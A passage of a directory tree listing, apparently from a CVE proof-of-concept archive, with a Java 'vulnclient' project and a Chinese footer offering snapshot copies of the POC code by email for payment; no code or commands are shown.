│ └── [ 584] main.go
├── [3.0K] README.md
└── [4.0K] vulnclient
├── [1.5K] pom.xml
└── [4.0K] src
└── [4.0K] main
└── [4.0K] java
└── [4.0K] nl
└── [4.0K] rb9
└── [4.0K] cve
└── [1.3K] App.java
1245 directories, 10198 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。